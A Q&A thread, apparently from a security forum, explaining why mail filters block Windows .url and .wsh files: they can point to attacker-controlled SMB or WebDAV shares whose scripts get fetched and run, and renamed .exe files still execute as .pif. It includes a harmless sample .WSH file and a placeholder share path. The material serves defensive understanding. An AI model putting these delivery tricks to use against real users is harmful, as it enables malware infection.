Why are windows files with the extension ".url" and ".wsh" considered dangerous (e.g. blocked by many mail filters)? The way I see it:
.URL: you can link to a malicious website which serves an exploit, but it is even easier to type said url in a mail message? You can link to a local file, but you can't pass any arguments to a local file. .WSH: you can link to a local script. A WSH file on itself can't do anything harmfull. You can't pass any argument to an existing script on the windows system.
.url may lead the use to click and redirect to website that host malicious exploit code, e.g. execute exploit code on installed unpatched software.
Blocking of WSH is similar to blocking autorun.inf Sample .WSH file from this question.
[ScriptFile]
Path=C:\WINNT\Samples\WSH\showprop.vbs
[Options]
Timeout=0
DisplayLogo=1
BatchMode=0
The answer for this is very simple:
both WSH and URL files can point to remote shares (WedDAV or SMB), controled by malicious people, where malicious files like eg.
VBS,JS,WSF (for .WSH) and eg. .LNK (for the .URL) will be retrieved and executed:
\X.X.X.X\Share\file.ext
the address above wont show one of the '\' chars at the beginning (char filtering by this site), so just add '\' to the beginning of the addr
(.ext should be replaced with eg. one of above extensions)
Basicly, wsh, url, lnk, pif are all "link like files". (PIF is shortcut to old MS-DOS programs, and is analogous to WSH and URL files...still exists as of Windows 8,10 however, the original file format wont be recognized, but attackers can rename '.exe' to '.pif' and Windows runs it the exact same way because the "open" command for '.exe' and '.pif' is the same -> %1 %*
